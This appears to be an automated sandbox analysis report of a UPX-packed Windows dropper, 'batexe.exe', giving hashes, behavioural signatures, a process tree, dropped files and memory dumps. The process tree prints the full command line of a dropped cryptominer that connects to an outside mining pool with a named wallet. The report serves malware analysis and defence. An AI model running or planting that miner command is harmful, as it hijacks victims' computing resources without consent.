Analysis

  • max time kernel
    300s
  • max time network
    302s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    13-02-2024 05:03

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1860
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\97DB.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2080
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2404

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe

    Filesize

    17.7MB

    MD5

    e59d33e8f081452b10be341e86bff667

    SHA1

    4d6572b1f8a45176908e61c0070e5ead19f3e2c2

    SHA256

    86effbb06a8d6214a3bf5fcde3fb84384cfa43151d72e7fbab1b331df83fe16d

    SHA512

    ef2ccbc76d3211f82b2d003e15a072e1b5ad5a60e6ee9a7b2943d74b5d62c5a9c1877a6fba7b6ed6685b8ad2dacbf87fd358b99a1706f18c5c03e87c3d4d57e0

  • C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe

    Filesize

    5.1MB

    MD5

    2a717cabcbb60f293002bf30828d27b9

    SHA1

    3329f5a03f6a6b9185a20e6e48f6d0304518c2be

    SHA256

    0b64f36a955a38b1a256094758035c21cccbe3de50f05ceb1efb767bca5f7b56

    SHA512

    63163026e7f7c60578710ea56fb4ed1f23f231ea15654eb7ac6b094bc3f8e7fc99eec41c636e2137603ca651abea6b08b3fc6dfef30aceaca5151d866899b06c

  • C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe

    Filesize

    5.3MB

    MD5

    9052fdb24dd5c4b87faaa785c836d7a6

    SHA1

    f300f1f81a4001d1f8ae4196acf5a615fb859d21

    SHA256

    adf48aceaa3e2c7b9c55dcf36c9ef045f2f36ba5ee3596cee31e560e3323f60b

    SHA512

    6b4b6e3ebaa72cca6d091ead4b64d70ed06d6900e5aa56d445a2b5e353b29564b724047fd022766f85eb45caf3020a2109f81c55986f5fe1f96b48cf5399954d

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    2.3MB

    MD5

    4c04147c386ba8792ac6a03069572a8a

    SHA1

    dda67789fc1d0f2469ca95f01a5c81034853ca6a

    SHA256

    c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

    SHA512

    a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    7cf672bee2afba2dcd0c031ff985958e

    SHA1

    6b82a205db080ffdcb4a4470fce85a14413f3217

    SHA256

    c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

    SHA512

    3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    4.1MB

    MD5

    32dbbfd7b361038a50e9b5bb0278e3a7

    SHA1

    903462e1ff67257defc9738148a8fc60590e4de3

    SHA256

    6119e724050dcabb90de066256c1615072ea7089e8259d40a1e66c2d4b11bfbb

    SHA512

    d82ebb17c2c86fdee0469e3ec2faf94d63e1e4aeab2e0ce9d74a805ec8fb381a4dbf4806ff3a4c464f6a199fa70164fb823d3301967efbf5a2c30d8e09e8adc7

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    5.6MB

    MD5

    ee1dd80d0ec47b61e2cfbda65eec7743

    SHA1

    4e6c2c67a032935c5e68549e0fecb1dd288f061a

    SHA256

    1fb53c5617a2162c323dcd1f375a8f9aeef0e2ce04232d909f6c4e162a567b15

    SHA512

    bb00a74fe926d58169783f20c698586440e4255f478f1199b007a42b607b5b58779053671021d99b967ed8ea274ad50681663d3288e82cb0d44ab5b66fabe955

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    4.6MB

    MD5

    2d0313a655440e87aa3c0c928026ee16

    SHA1

    2275a64c92180d88e646b8852ace630ee11ce085

    SHA256

    b94d18754c2d8478151e0d73faa055fa69da602531d4891d9ddcd2a65124409c

    SHA512

    a253fb7c977895a6d6cb508729af9b4a06d85f24c62a0b0fc0baa2b4e463e0ba53416ede4a5f9efdd244e3a0cbe99732b07b73d2eaef2a02ca72b064c00569a8

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • memory/1860-53-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1860-8-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/2404-44-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/2404-54-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-45-0x000000006FEB0000-0x000000006FF48000-memory.dmp

    Filesize

    608KB

  • memory/2404-46-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/2404-47-0x0000000000EC0000-0x0000000002775000-memory.dmp

    Filesize

    24.7MB

  • memory/2404-48-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-104-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-43-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-59-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-69-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-79-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-89-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-94-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2404-99-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/5076-9-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB